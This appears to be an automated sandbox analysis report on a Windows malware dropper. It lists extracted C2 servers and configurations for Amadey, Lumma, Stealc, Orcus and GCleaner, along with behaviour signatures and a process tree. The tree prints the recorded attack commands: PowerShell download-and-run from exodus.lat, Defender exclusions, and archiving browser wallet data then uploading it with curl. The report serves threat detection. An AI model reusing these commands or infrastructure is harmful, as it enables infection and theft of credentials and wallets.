Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06/12/2024, 02:16 UTC

General

  • Target

    1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe

  • Size

    5.4MB

  • MD5

    d8e277397a6ffa5f6d556c76ccaefe44

  • SHA1

    544877ae6fb4d5f5252e6b191c51dbc62981da8a

  • SHA256

    1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e

  • SHA512

    6c41384aeb0343d2f771a1c693c27363ddc31fc88b0fa54db2bba6f46fee87d7f0d0d6620c6de8f4875a6afd819646d18404ceb76736bd87bf6d0e9743b54725

  • SSDEEP

    98304:A3Mo6YwJNkk3IHikKQ7bbCUvCGMYtqClKwQv7EKGUG6N1BqLHshga2k6QwCTC0U0:AZ6YgNkvKCCUvCZYRsVv7fGUGSBq7vPk

Malware Config

Extracted

Language
ps1
Deobfuscated
&{(new-object net.webclient).downloadfile("https://exodus.lat/COMSurrogate.exe", "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe")}
URLs
exe.dropper

https://exodus.lat/COMSurrogate.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

https://ratiomun.cyou/api

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

orcus

C2

45.74.38.211:4782

Mutex

7a9c0f279c464958aebbd585f20f1cf2

Attributes
  • autostart_method

    Disable

  • enable_keylogger

    false

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    AppData\OrcusWatchdog.exe

Extracted

Family

gcleaner

C2

92.63.197.221

45.91.200.135

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

https://dwell-exclaim.biz/api

https://formy-spill.biz/api

https://covery-mover.biz/api

https://dare-curbys.biz/api

https://print-vexer.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • TA505

    Cybercrime group active since 2015, responsible for families like Dridex and Locky.

  • Ta505 family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Orcus RAT Executable 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive data.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 59 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    PID:3364
      • C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe
        "C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe"
        2⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3448
        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4048
          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:1848
            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
              "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2564
              • C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
                "C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4764
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1640
                  7⤵
                  • Program crash
                  PID:4532
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1620
                  7⤵
                  • Program crash
                  PID:3952
              • C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
                "C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2068
                • C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp" /SL5="$80238,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:1988
                  • C:\Windows\SysWOW64\net.exe
                    "C:\Windows\system32\net.exe" pause raf_encoder_1252
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3844
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 pause raf_encoder_1252
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2544
                  • C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
                    "C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1888
              • C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
                "C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3620
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4956
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2044
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "wrsa opssvc"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:3844
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2544
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1896
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c md 491505
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2208
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:544
                  • C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
                    Dr.com B
                    8⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:3564
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1264
                    • C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
                      C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
                      9⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3548
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:6340
                        • C:\Windows\SysWOW64\net.exe
                          net session
                          11⤵
                          • System Location Discovery: System Language Discovery
                          PID:6404
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 session
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:6432
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
                          11⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:6456
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
                          11⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:812
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                          11⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5748
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:6708
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
                          11⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:6876
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"
                          11⤵
                          • System Location Discovery: System Language Discovery
                          PID:5524
                          • C:\Windows\SysWOW64\xcopy.exe
                            xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"
                            12⤵
                            • System Location Discovery: System Language Discovery
                            • Enumerates system info in registry
                            PID:4408
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:6052
                            • C:\Windows\SysWOW64\curl.exe
                              curl -s https://api.ipify.org
                              13⤵
                              • System Location Discovery: System Language Discovery
                              PID:6060
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"
                            12⤵
                            • Command and Scripting Interpreter: PowerShell
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4524
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:3060
                            • C:\Windows\SysWOW64\curl.exe
                              curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"
                              13⤵
                              • System Location Discovery: System Language Discovery
                              PID:3828
                      • C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
                        "C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"
                        10⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        PID:6616
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:6924
                        • C:\Windows\SysWOW64\net.exe
                          net session
                          11⤵
                          • System Location Discovery: System Language Discovery
                          PID:3248
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 session
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:4732
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
                          11⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5188
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
                          11⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5628
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                          11⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4872
                          • C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe
                            "C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"
                            12⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            PID:6300
                            • C:\Users\Admin\AppData\Local\asm\mi.exe
                              "C:\Users\Admin\AppData\Local\asm\mi.exe" --config="C:\Users\Admin\AppData\Local\asm\config.json"
                              13⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              PID:2020
                  • C:\Windows\SysWOW64\choice.exe
                    choice /d y /t 15
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1312
              • C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe
                "C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1500
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1632
                  7⤵
                  • Program crash
                  PID:4748
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1652
                  7⤵
                  • Program crash
                  PID:3936
              • C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe
                "C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2388
              • C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe
                "C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:512
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM firefox.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4532
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM chrome.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2324
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM msedge.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4796
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM opera.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4704
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM brave.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4572
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                  7⤵
                   PID:4396
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      8⤵
                      • Checks processor information in registry
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of SetWindowsHookEx
                      PID:1852
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2036 -parentBuildID 20240401114208 -prefsHandle 1964 -prefMapHandle 1956 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95f03138-6534-469c-8f21-5220d70f3425} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" gpu
                        9⤵
                         PID:628
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a9b937f-b66b-4cc9-a25d-ce5d9d590e9a} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" socket
                          9⤵
                           PID:1172
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3132 -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d9752fd-55e6-47e9-b2d7-aad876e04da4} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
                            9⤵
                             PID:216
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4124 -childID 2 -isForBrowser -prefsHandle 4196 -prefMapHandle 4192 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64c0a44d-dba6-499e-8750-28083730bc69} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
                              9⤵
                                PID:1140
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4840 -prefMapHandle 4836 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4af03d6e-1024-4cb8-ab8e-fbff5239d5a3} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" utility
                                9⤵
                                • Checks processor information in registry
                                PID:5180
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5312 -childID 3 -isForBrowser -prefsHandle 5300 -prefMapHandle 5304 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89a3350a-4d71-49fb-ae2d-0bb5475aadd7} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
                                9⤵
                                  PID:7068
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 4 -isForBrowser -prefsHandle 5372 -prefMapHandle 5380 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e83fb09-95a2-42b0-b296-22cf085bf81a} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
                                  9⤵
                                    PID:7140
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5360 -childID 5 -isForBrowser -prefsHandle 5588 -prefMapHandle 5592 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0e71c56-2449-4833-8005-4cf322f47822} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
                                    9⤵
                                      PID:2904
                              • C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe
                                "C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe"
                                6⤵
                                • Modifies Windows Defender Real-time Protection settings
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Windows security modification
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:6684
                              • C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe
                                "C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe"
                                6⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                PID:5732
                          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
                            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2904
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 1648
                              5⤵
                              • Program crash
                              PID:3652
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 1664
                              5⤵
                              • Program crash
                              PID:3468
                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1912
                      • C:\Windows\SysWOW64\cmd.exe
